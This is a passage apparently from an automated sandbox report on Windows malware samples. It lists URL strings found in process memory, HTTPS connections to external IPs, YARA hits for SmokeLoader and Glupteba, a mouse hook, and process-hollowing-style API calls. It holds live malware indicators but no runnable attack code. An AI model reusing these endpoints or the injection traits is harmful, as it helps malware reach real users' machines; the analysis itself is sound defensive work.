      Source: yevbZfdCqR.exe, 00000001.00000003.654242726.0000000005DE1000.00000004.00000001.sdmp, LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000002.1034470755.0000000001762000.00000004.00000001.sdmp, LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000002.987178090.0000000000C53000.00000002.00020000.sdmp, jooyu.exe, 0000001A.00000002.965275698.00000000003F3000.00000002.00020000.sdmpString found in binary or memory: https://script.google.com/macros/s/AKfycbyeDUociDSMjODhy_ZapM5zzyoJ3zrch9n5IUJeKIM3UQOEtZs/exec?loc=
      Source: oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000003.957981451.0000000000B4B000.00000004.00000001.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
      Source: oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000003.957981451.0000000000B4B000.00000004.00000001.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
      Source: yevbZfdCqR.exe, 00000001.00000003.647771339.0000000005DE1000.00000004.00000001.sdmp, oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000003.928879580.0000000000B2D000.00000004.00000001.sdmp, 5hIw8OebGuR7XztS5WBp_Scm.exe, 00000012.00000003.704147126.00000000048E0000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0
      Source: oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000003.746523925.0000000000B26000.00000004.00000001.sdmpString found in binary or memory: https://sergeevih43.tumblr.com
      Source: oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000003.747768629.0000000000B2D000.00000004.00000001.sdmpString found in binary or memory: https://sergeevih43.tumblr.com/
      Source: oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000003.747768629.0000000000B2D000.00000004.00000001.sdmpString found in binary or memory: https://sergeevih43.tumblr.com/?
      Source: oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000003.746523925.0000000000B26000.00000004.00000001.sdmpString found in binary or memory: https://sergeevih43.tumblr.com/?og=1
      Source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.742691059.00000000037E0000.00000004.00000001.sdmpString found in binary or memory: https://sndvoices.comhttps://spolaect.infoimage:
      Source: Browzar.exe, 0000001D.00000003.736239537.0000000008D4D000.00000004.00000001.sdmp, Browzar.exe, 0000001D.00000003.741127670.0000000008EE6000.00000004.00000001.sdmp, Browzar.exe, 0000001D.00000003.737737782.000000000261F000.00000004.00000001.sdmpString found in binary or memory: https://ssl.google-analytics.com
      Source: Browzar.exe, 0000001D.00000003.755686274.00000000090F5000.00000004.00000001.sdmp, Browzar.exe, 0000001D.00000003.736239537.0000000008D4D000.00000004.00000001.sdmp, Browzar.exe, 0000001D.00000003.737737782.000000000261F000.00000004.00000001.sdmpString found in binary or memory: https://ssl.google-analytics.com/j/__utm.gif
      Source: LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000003.749546069.0000000001767000.00000004.00000001.sdmp, LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000003.762195640.0000000001766000.00000004.00000001.sdmp, jooyu.exe, 0000001A.00000003.762651652.0000000002041000.00000004.00000001.sdmp, jooyu.exe, 0000001A.00000003.785194804.0000000002074000.00000004.00000001.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/y0/l/0
      Source: LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000003.749546069.0000000001767000.00000004.00000001.sdmp, LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000003.762195640.0000000001766000.00000004.00000001.sdmp, jooyu.exe, 0000001A.00000003.762651652.0000000002041000.00000004.00000001.sdmp, jooyu.exe, 0000001A.00000003.785194804.0000000002074000.00000004.00000001.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/y1/l/0
      Source: LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000003.762195640.0000000001766000.00000004.00000001.sdmp, jooyu.exe, 0000001A.00000003.785194804.0000000002074000.00000004.00000001.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yC/r/7ZFB1ufJs4D.js?_nc_x=Ij3Wp8lg5Kz
      Source: jooyu.exe, 0000001A.00000003.762651652.0000000002041000.00000004.00000001.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yF/r/7MOYH3aUX1N.js?_nc_x=Ij3Wp8lg5Kz
      Source: LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000003.749546069.0000000001767000.00000004.00000001.sdmp, jooyu.exe, 0000001A.00000003.785194804.0000000002074000.00000004.00000001.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yM/r/qqpNll8cJ0G.js?_nc_x=Ij3Wp8lg5Kz
      Source: LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000003.749546069.0000000001767000.00000004.00000001.sdmp, LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000003.762195640.0000000001766000.00000004.00000001.sdmp, jooyu.exe, 0000001A.00000003.762651652.0000000002041000.00000004.00000001.sdmp, jooyu.exe, 0000001A.00000003.785194804.0000000002074000.00000004.00000001.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yT/l/0
      Source: LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000003.749546069.0000000001767000.00000004.00000001.sdmp, LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000003.762195640.0000000001766000.00000004.00000001.sdmp, jooyu.exe, 0000001A.00000003.762651652.0000000002041000.00000004.00000001.sdmp, jooyu.exe, 0000001A.00000003.785194804.0000000002074000.00000004.00000001.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yU/l/0
      Source: LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000003.749546069.0000000001767000.00000004.00000001.sdmp, LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000003.762195640.0000000001766000.00000004.00000001.sdmp, jooyu.exe, 0000001A.00000003.762651652.0000000002041000.00000004.00000001.sdmp, jooyu.exe, 0000001A.00000003.785194804.0000000002074000.00000004.00000001.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yV/l/0
      Source: LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000003.749546069.0000000001767000.00000004.00000001.sdmp, LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000003.762195640.0000000001766000.00000004.00000001.sdmp, jooyu.exe, 0000001A.00000003.762651652.0000000002041000.00000004.00000001.sdmp, jooyu.exe, 0000001A.00000003.785194804.0000000002074000.00000004.00000001.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/y_/l/0
      Source: LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000003.749546069.0000000001767000.00000004.00000001.sdmp, LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000003.762195640.0000000001766000.00000004.00000001.sdmp, jooyu.exe, 0000001A.00000003.762651652.0000000002041000.00000004.00000001.sdmp, jooyu.exe, 0000001A.00000003.785194804.0000000002074000.00000004.00000001.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/ya/l/0
      Source: LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000003.749546069.0000000001767000.00000004.00000001.sdmp, LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000003.762195640.0000000001766000.00000004.00000001.sdmp, jooyu.exe, 0000001A.00000003.762651652.0000000002041000.00000004.00000001.sdmp, jooyu.exe, 0000001A.00000003.785194804.0000000002074000.00000004.00000001.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/ye/l/0
      Source: LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000003.749546069.0000000001767000.00000004.00000001.sdmp, LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000003.762195640.0000000001766000.00000004.00000001.sdmp, jooyu.exe, 0000001A.00000003.762651652.0000000002041000.00000004.00000001.sdmp, jooyu.exe, 0000001A.00000003.785194804.0000000002074000.00000004.00000001.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yj/l/0
      Source: LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000003.749546069.0000000001767000.00000004.00000001.sdmp, LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000003.762195640.0000000001766000.00000004.00000001.sdmp, jooyu.exe, 0000001A.00000003.762651652.0000000002041000.00000004.00000001.sdmp, jooyu.exe, 0000001A.00000003.785194804.0000000002074000.00000004.00000001.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yl/l/0
      Source: LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000003.762195640.0000000001766000.00000004.00000001.sdmp, jooyu.exe, 0000001A.00000003.785194804.0000000002074000.00000004.00000001.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/ym/l/0
      Source: LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000003.745782059.000000000176F000.00000004.00000001.sdmp, jooyu.exe, 0000001A.00000003.760628492.0000000002074000.00000004.00000001.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/ym/r/viez5begUCl.js?_nc_x=Ij3Wp8lg5Kz
      Source: LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000003.749546069.0000000001767000.00000004.00000001.sdmp, LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000003.762195640.0000000001766000.00000004.00000001.sdmp, jooyu.exe, 0000001A.00000003.762651652.0000000002041000.00000004.00000001.sdmp, jooyu.exe, 0000001A.00000003.785194804.0000000002074000.00000004.00000001.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yp/l/0
      Source: LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000003.762195640.0000000001766000.00000004.00000001.sdmp, jooyu.exe, 0000001A.00000003.785194804.0000000002074000.00000004.00000001.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yq/r/49k3IgkO4JO.js?_nc_x=Ij3Wp8lg5Kz
      Source: LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000003.745782059.000000000176F000.00000004.00000001.sdmp, jooyu.exe, 0000001A.00000003.760628492.0000000002074000.00000004.00000001.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yw/r/it1hKJ4ErU1.js?_nc_x=Ij3Wp8lg5Kz
      Source: LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000003.762195640.0000000001766000.00000004.00000001.sdmp, jooyu.exe, 0000001A.00000003.785194804.0000000002074000.00000004.00000001.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3iN_84/y6/l/de_DE/9Ob-nhb0RQ7.js?_nc_x=Ij3Wp8lg5Kz
      Source: LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000003.745782059.000000000176F000.00000004.00000001.sdmp, jooyu.exe, 0000001A.00000003.760628492.0000000002074000.00000004.00000001.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3iN_84/yn/l/de_DE/yrbiZiSm91a.js?_nc_x=Ij3Wp8lg5Kz
      Source: Browzar.exe, 0000001D.00000003.755686274.00000000090F5000.00000004.00000001.sdmp, Browzar.exe, 0000001D.00000003.736239537.0000000008D4D000.00000004.00000001.sdmp, Browzar.exe, 0000001D.00000003.737737782.000000000261F000.00000004.00000001.sdmpString found in binary or memory: https://stats.g.doubleclick.net/j/collect?
      Source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.742691059.00000000037E0000.00000004.00000001.sdmpString found in binary or memory: https://stiambat.cominvalid
      Source: jfiag3g_gg.exe, 00000017.00000003.714085549.0000000002811000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
      Source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.742691059.00000000037E0000.00000004.00000001.sdmpString found in binary or memory: https://turnitin.com/robot/crawlerinfo.html)couldn
      Source: yevbZfdCqR.exe, 00000001.00000003.658257758.0000000005DE1000.00000004.00000001.sdmp, 5hIw8OebGuR7XztS5WBp_Scm.exe, 00000012.00000002.993457562.00000000020A0000.00000004.00000001.sdmpString found in binary or memory: https://www.browzar.com
      Source: yevbZfdCqR.exe, 00000001.00000003.658257758.0000000005DE1000.00000004.00000001.sdmpString found in binary or memory: https://www.browzar.com83886080Browzar000110Browzar1Browzar
      Source: 5hIw8OebGuR7XztS5WBp_Scm.exe, 00000012.00000002.993457562.00000000020A0000.00000004.00000001.sdmpString found in binary or memory: https://www.browzar.comL
      Source: yevbZfdCqR.exe, 00000001.00000002.753235699.0000000004F4C000.00000004.00000001.sdmp, md8_8eus.exe, 00000023.00000003.942943627.0000000003FB0000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
      Source: Browzar.exe, 0000001D.00000003.736239537.0000000008D4D000.00000004.00000001.sdmp, Browzar.exe, 0000001D.00000003.741127670.0000000008EE6000.00000004.00000001.sdmp, Browzar.exe, 0000001D.00000003.737737782.000000000261F000.00000004.00000001.sdmpString found in binary or memory: https://www.google.%/ads/ga-audiences?
      Source: Browzar.exe, 0000001D.00000002.1012921761.0000000000804000.00000004.00000020.sdmpString found in binary or memory: https://www.google.com&gl=GB&pc=s&uxe=4421591LMEM(
      Source: md8_8eus.exe, 00000023.00000003.921488026.0000000003E81000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/?gws_rd=ssl
      Source: Browzar.exe, 0000001D.00000003.736218551.0000000008CDC000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/adsense
      Source: Browzar.exe, 0000001D.00000003.768656531.0000000009247000.00000004.00000001.sdmp, Browzar.exe, 0000001D.00000003.736239537.0000000008D4D000.00000004.00000001.sdmp, Browzar.exe, 0000001D.00000003.737737782.000000000261F000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/analytics/web/inpage/pub/inpage.js?
      Source: md8_8eus.exe, 00000023.00000003.921488026.0000000003E81000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
      Source: Browzar.exe, 0000001D.00000003.736239537.0000000008D4D000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/cse/static/element/%
      Source: Browzar.exe, 0000001D.00000003.736239537.0000000008D4D000.00000004.00000001.sdmp, Browzar.exe, 0000001D.00000003.765032236.0000000009211000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/cse/static/style/look/%
      Source: md8_8eus.exe, 00000023.00000003.921488026.0000000003E81000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/favicon.ico
      Source: oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000003.957981451.0000000000B4B000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
      Source: md8_8eus.exe, 00000023.00000003.956833511.0000000004018000.00000004.00000001.sdmp, md8_8eus.exe, 00000023.00000003.921488026.0000000003E81000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/intl/en_uk/chrome/
      Source: md8_8eus.exe, 00000023.00000003.950342573.0000000003FE0000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/intl/en_uk/chrome/application/x-msdownloadC:
      Source: md8_8eus.exe, 00000023.00000003.956833511.0000000004018000.00000004.00000001.sdmp, md8_8eus.exe, 00000023.00000003.921488026.0000000003E81000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrows
      Source: md8_8eus.exe, 00000023.00000003.921488026.0000000003E81000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/search
      Source: md8_8eus.exe, 00000023.00000003.956833511.0000000004018000.00000004.00000001.sdmp, md8_8eus.exe, 00000023.00000003.921488026.0000000003E81000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/search?source=hp&ei=djJ0X6TKCL6IjLsPqriogAY&q=chrome&oq=chrome&gs_lcp=CgZwc3k
      Source: md8_8eus.exe, 00000023.00000003.921488026.0000000003E81000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwj8k7G9rJDsAhWNTxUIHZZGDCQQ
      Source: md8_8eus.exe, 00000023.00000003.921052595.0000000003E1A000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/xjs/_/js/k=xjs.s.en_GB.u8fwEfmm86E.O/ck=xjs.s.hyRG9kR79v8.L.I11.O/am=AAAAAABA
      Source: Browzar.exe, 0000001D.00000002.1020799715.0000000000848000.00000004.00000020.sdmp, md8_8eus.exe, 00000023.00000003.921603743.0000000003EB8000.00000004.00000001.sdmpString found in binary or memory: https://www.googleadservices.com/pagead/p3p.xml
      Source: md8_8eus.exe, 00000023.00000003.921052595.0000000003E1A000.00000004.00000001.sdmpString found in binary or memory: https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.ConsentUi.en_GB.wmTUy5P6FUM.es5.O/ck=
      Source: md8_8eus.exe, 00000023.00000003.921052595.0000000003E1A000.00000004.00000001.sdmpString found in binary or memory: https://www.gstatic.com/_/mss/boq-one-google/_/js/k=boq-one-google.OneGoogleWidgetUi.en.bMYZ6MazNlM.
      Source: md8_8eus.exe, 00000023.00000003.932319523.0000000003F58000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/
      Source: oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000002.1007887784.0000000000B11000.00000004.00000001.sdmpString found in binary or memory: https://www.tumblr.com/login
      Source: oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000002.1007887784.0000000000B11000.00000004.00000001.sdmpString found in binary or memory: https://www.tumblr.com/policy/en/privac)
      Source: oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000002.1007887784.0000000000B11000.00000004.00000001.sdmpString found in binary or memory: https://www.tumblr.com/policy/en/privacy
      Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
      Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
      Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
      Source: unknownHTTPS traffic detected: 104.21.65.45:443 -> 192.168.2.4:49753 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.4:49768 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.4:49767 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.59.252:443 -> 192.168.2.4:49769 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 157.240.17.35:443 -> 192.168.2.4:49795 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 74.114.154.22:443 -> 192.168.2.4:49796 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 74.114.154.22:443 -> 192.168.2.4:49808 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.4:49812 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 157.240.17.35:443 -> 192.168.2.4:49813 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.4:49815 version: TLS 1.2

      Key, Mouse, Clipboard, Microphone and Screen Capturing:

      barindex
      Yara detected SmokeLoader
      Source: Yara matchFile source: 30.1.MQ5u6_H0cs9EUXsesfNpGUNc.exe.400000.0.unpack, type: UNPACKEDPE
      Source: yevbZfdCqR.exe, 00000001.00000002.749565925.0000000000F3A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
      Source: C:\Program Files (x86)\Browzar\Browzar.exeWindows user hook set: 0 mouse low level C:\Windows\system32\dinput8.dll

      E-Banking Fraud:

      barindex
      Yara detected Glupteba
      Source: Yara matchFile source: Process Memory Space: KyTQCmNmjazMZrvIWzjrSsQG.exe PID: 6476, type: MEMORY
      Source: Yara matchFile source: 19.3.KyTQCmNmjazMZrvIWzjrSsQG.exe.37e0000.0.unpack, type: UNPACKEDPE

      System Summary:

      barindex
      .NET source code contains very large array initializations
      Source: file9[1].exe.1.dr, RpgGameApp/RpgClass.csLarge array initialization: System.Byte[] RpgGameApp.RpgClass::PLD: array initializer size 42081
      Source: file9[1].exe.1.dr, RpgGameApp/RpgClass.csLarge array initialization: .cctor: array initializer size 58666
      Source: 8.2.awTgWtFfNpBsevxQFHzT446w.exe.430000.0.unpack, RpgGameApp/RpgClass.csLarge array initialization: System.Byte[] RpgGameApp.RpgClass::PLD: array initializer size 42081
      Source: 8.2.awTgWtFfNpBsevxQFHzT446w.exe.430000.0.unpack, RpgGameApp/RpgClass.csLarge array initialization: .cctor: array initializer size 58666
      Source: 8.0.awTgWtFfNpBsevxQFHzT446w.exe.430000.0.unpack, RpgGameApp/RpgClass.csLarge array initialization: System.Byte[] RpgGameApp.RpgClass::PLD: array initializer size 42081
      Source: 8.0.awTgWtFfNpBsevxQFHzT446w.exe.430000.0.unpack, RpgGameApp/RpgClass.csLarge array initialization: .cctor: array initializer size 58666
      Source: 12.0.gUlDp5No64Xfcgfbo3IlvG0y.exe.c90000.0.unpack, RpgGameApp/RpgClass.csLarge array initialization: System.Byte[] RpgGameApp.RpgClass::PLD: array initializer size 379880
      Source: 12.0.gUlDp5No64Xfcgfbo3IlvG0y.exe.c90000.0.unpack, RpgGameApp/RpgClass.csLarge array initialization: .cctor: array initializer size 58666
      Source: 12.2.gUlDp5No64Xfcgfbo3IlvG0y.exe.c90000.0.unpack, RpgGameApp/RpgClass.csLarge array initialization: System.Byte[] RpgGameApp.RpgClass::PLD: array initializer size 379880
      Source: 12.2.gUlDp5No64Xfcgfbo3IlvG0y.exe.c90000.0.unpack, RpgGameApp/RpgClass.csLarge array initialization: .cctor: array initializer size 58666
      .NET source code contains very large strings
      Source: 6.0.YX7wpjoMI0vZoMwVbFh9XNIC.exe.bf0000.0.unpack, SystemSecurityCryptographyCAPIBaseCMSGCMSRECIPIENTINFO30299.csLong String: Length: 172980
      Source: 6.2.YX7wpjoMI0vZoMwVbFh9XNIC.exe.bf0000.0.unpack, SystemSecurityCryptographyCAPIBaseCMSGCMSRECIPIENTINFO30299.csLong String: Length: 172980
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: 1_2_01229070 __aulldiv,VirtualAlloc,__aulldiv,VirtualAlloc,__aulldiv,NtQuerySystemInformation,__aulldiv,NtQuerySystemInformation,WideCharToMultiByte,CharToOemA,WideCharToMultiByte,CharToOemA,_strstr,__aulldiv,VirtualFree,VirtualFree,
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeCode function: 6_2_01473D00 NtAllocateVirtualMemory,
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeCode function: 6_2_01473C00 NtUnmapViewOfSection,
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeCode function: 6_2_01473BF9 NtUnmapViewOfSection,
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeCode function: 6_2_01473CF9 NtAllocateVirtualMemory,
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: 1_2_01230970
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: 1_2_012619C0
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: 1_2_0124D030
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: 1_2_0124F8E0
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: 1_2_01250360
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: 1_2_012303D0
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: 1_2_0121B270
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: 1_2_01228C40
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: 1_2_0122A490
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: 1_2_0129C92E
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: 1_2_01287160
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: 1_2_01282176
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: 1_2_01273990
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: 1_2_012989D2
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: 1_2_0129C80E
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: 1_2_01229070
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: 1_2_01213080
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: 1_2_012823D3
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: 1_2_01262A60
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: 1_2_0121BAB0
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: 1_2_01279AE3
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: 1_2_01222D00
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: 1_2_01215D90
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: 1_2_01212C10
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: 1_2_0129AC8B
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: 1_2_01281F44
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: 1_2_01277E20
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: 1_2_01211E30
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeCode function: 4_2_00408C60
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeCode function: 4_2_0040DC11
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeCode function: 4_2_00407C3F
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeCode function: 4_2_00418CCC
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeCode function: 4_2_00406CA0
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeCode function: 4_2_004028B0
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeCode function: 4_2_0041A4BE
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeCode function: 4_2_00418244
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeCode function: 4_2_00401650
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeCode function: 4_2_00402F20
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeCode function: 4_2_004193C4
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeCode function: 4_2_00418788
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeCode function: 4_2_00402F89
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeCode function: 4_2_00402B90
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeCode function: 4_2_004073A0
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeCode function: 4_2_00443F20
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_00442470
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_00465C3F
